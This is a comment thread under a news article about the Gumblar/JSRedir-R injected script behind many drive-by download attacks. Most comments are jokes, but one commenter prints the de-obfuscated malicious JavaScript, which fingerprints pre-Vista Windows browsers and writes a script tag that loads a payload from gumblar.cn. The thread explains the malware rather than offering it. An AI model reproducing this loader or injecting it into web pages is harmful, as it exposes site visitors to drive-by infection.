Feeds

back to article New script outstrips all other drive-by download risks

A newly-created malicious script has become the source of almost half the drive-by download attacks tracked by one security firm. JSRedir-R accounts for around 43 per cent of all malicious infections found on websites over the last week, according to a study by net security firm Sophos, published on Thursday. The malware crops …

COMMENTS

This topic is closed for new posts.
Alien

Another good writeup here

Another good writeup here: http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

It seems to be cropping up all over the place with no obvious infection vector.

Linux

2G1C

haha.

"Erm, I have a virus"

"Did you go on 2G1C?"

"Erm, yes...."

Alert

2 girls 1 cup

I thought that was the most disgusting thing I'd ever seen on the internet, until I saw 1 man 1 jar.

I nearly threw up on my laptop.

Coat

"2 Girls 1 Cup scat video viral website."

I guess they must have crappy security...

Anonymous Coward

Malware

I thought malware writes itself nowadays.

Boffin

Clever script

I ran into this on one site, glad I had avast! running. The script was on every page, and an iframe on the home page only. There's a bit of obfuscation beyond the character escaping, which I've removed here. It checks for the browser running on pre-Vista Windows, and uses typeof() cleverly to make sure it only runs once. Note that it sends the JavaScript engine version number to gumblar.cn, which can then provide a script that is known to be effective on the user's particular browser, and divulge nothing to researchers using non-vulnerable browsers. Hopefully this is readable, the form refuses to respect any kind of formatting.

function(){

var versionString = "";

if( (navigator.userAgent.indexOf("Win")>0) && (navigator.userAgent.indexOf("NT 6")<0) && (document.cookie.indexOf("miek=1")<0) && (typeof(zrvzts)!=typeof("A")) ) {

zrvzts="A";

if(window.ScriptEngine) {

versionString = "" + ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion();

}

document.write(" <script src=//gumblar.cn/rss/?id=" + versionString + "></script>" );

} }

Coat

@The Author

"The malicious script has also cropped up on the 2 Girls 1 Cup scat video viral website."

NO JUST NO

It took me a month to get that image out of my head and here you go putting it back there.

I guess im just going to do like Sam Neil in Event Horizon

http://www.ibiblio.org/samneill/pictures/eh/510beautiful1.jpg

/Good bye to my eyes

Jobs Horns

apple salesmen.

Apple will be happy, more of the the weak minded who get this kind of crap on their computer will be driven to buy a mac.(which is perfect for them).

Apple could write some themselves but they would be 200 megs and keep asking you if you want to update them.

Unhappy

@AC 15.01

>I thought that was the most disgusting thing I'd ever seen on the internet, until I saw 1 man 1 jar.<

Yeah, thanks for that. You owe me a new computer. This one smells real bad now

Stop

2g1c?

'2 girls 1 cup' < '1 guy 1 jar' < '1 guy 1 screwdriver'

god only knows whats going to be next.

Silver badge
Joke

I always thought it was:

2 girls 1 crap?

Eric Arthur Blair suggests...

"god only knows whats going to be next."

Is it 1 Boot (stamping on) 1 Face (forever)?

This topic is closed for new posts.